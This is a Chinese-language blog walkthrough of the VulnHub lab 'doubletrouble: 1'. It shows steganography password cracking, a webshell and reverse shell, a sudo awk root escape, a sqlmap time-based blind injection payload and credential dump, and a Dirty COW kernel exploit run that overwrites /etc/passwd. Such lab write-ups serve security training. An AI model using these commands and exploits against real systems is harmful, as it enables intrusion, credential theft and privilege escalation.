vulnhub刷題記錄（doubletrouble: 1）

• 英文名稱：doubletrouble: 1
• 中文名稱：雙重煩惱：1
• 釋出日期：2021 年 9 月 11 日
• 難度：容易
• 描述：關于 vm：測試并從 virtualbox 導出。啟用 dhcp 和嵌套 vtx/amdv。您可以通過電子郵件與我聯系以擷取故障排除或問題。
• 下載下傳位址：https://www.vulnhub.com/entry/empire-breakout,751/

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

1、主機發現（192.168.199.107）

主機發現

2、端口掃描，發現22端口和80端口

端口掃描

3、通路web頁面

4、搜尋web元件漏洞

web元件漏洞

5、發現web目錄

┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/       

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          
                                  
+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)                                                             
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)                                                                               
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)                                                                       
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)                                                                                                                                                      
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)                              
==> DIRECTORY: http://192.168.199.107/uploads/ 
==> DIRECTORY: http://192.168.199.107/backups/ 
==> DIRECTORY: http://192.168.199.107/secret/ 
...   
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5           

6、發現一個秘密檔案

線索

7、嘗試對圖檔進行提取嵌入資訊

steghide info doubletrouble.jpg           

嘗試提取圖檔中的資訊

8、使用Stegseek破解經過Steghide隐寫的資料[1]

Stegseek是迄今為止全世界最快的Steghide破解器，該工具每秒能夠處理數百萬的密碼。

值得一提的是，僅需兩秒鐘，該工具就可以跑完rockyou.txt字典。

而衆所周知，rockyou.txt是一個包含了超過1400萬個密碼的強大字典檔案。

─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt            

得到密碼：92camaro

秒出密碼：92camaro

9、再次提取圖檔中的嵌入資訊，得到郵箱和密碼

┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out 
[email protected]
otis666           

得到web管理者密碼

10、進入web背景，新增使用者 ailx10

新增使用者 ailx10

11、切換賬号，建立項目，上傳webshell

上傳webshell

12、反彈shell

反彈shell

13、檢視sudo，發現awk特權指令不需要密碼

更新root

14、更新到root權限，竟然發現另一個靶機，果然是個老六

sudo awk 'BEGIN {system("/bin/sh")}'           

遇見老六

15、nc 下載下傳到本地

服務端：
nc -lvp 4444 > ailx10_double_trouble.ova

用戶端：
nc 192.168.199.247 4444 < doubletrouble.ova           

下載下傳第二個 ova

16、開啟第二個靶機，重新再來一遍滲透流程

第二個靶機

17、主機發現，多了一個IP：192.168.199.171

新增一個IP位址：192.168.199.171

18、端口掃描，發現22、80端口

端口掃描

19、通路web頁面

web頁面

20、嘗試sqlmap注入

---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---           

存儲sql注入漏洞

21、嘗試獲得資料庫名字（doubletrouble）

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db           

資料庫名

22、嘗試獲得表名稱（users）

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables           

表名

23、嘗試獲得字段名稱（username，password）

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns           

字段名稱

24、嘗試獲得表中的字段内容

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1  |
| clapton  | ZubZub99 |
+----------+----------+           

字段内容

25、嘗試ssh登入，獲得普通使用者的flag

ssh登入，獲得普通flag

26、擷取系統資訊，嘗試發現漏洞

系統資訊

提權POC

27、編譯45010發現缺少檔案，隻好上髒牛[2]

髒牛漏洞(CVE-2016–5195)，影響低版本的Linux系統

Centos7/RHEL7     3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10      4.8.0-26.28
Ubuntu 16.04      4.4.0-45.66
Ubuntu 14.04      3.13.0-100.147
Debian 8          3.16.36-1+deb8u2
Debian 7          3.2.82-1           

漏洞具體是由于get_user_page核心函數在處理Copy-on-Write的過程中，可能産出競态條件造成COW過程被破壞，導緻出現寫資料到程序位址空間内隻讀記憶體區域的機會。

修改su或者passwd程式就可以達到root的目的。

clapton@doubletrouble:~$ ls
45010.c  dirty.c  user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c  dirty	dirty.c  user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash

mmap: 7f49735fb000           

28、提權，獲得root的flag

獲得root的flag

到此，實驗完成～

參考

1. ^stegseek https://github.com/RickdeJager/stegseek/releases
2. ^髒牛 https://github.com/firefart/dirtycow

編輯于 2022-08-21 21:08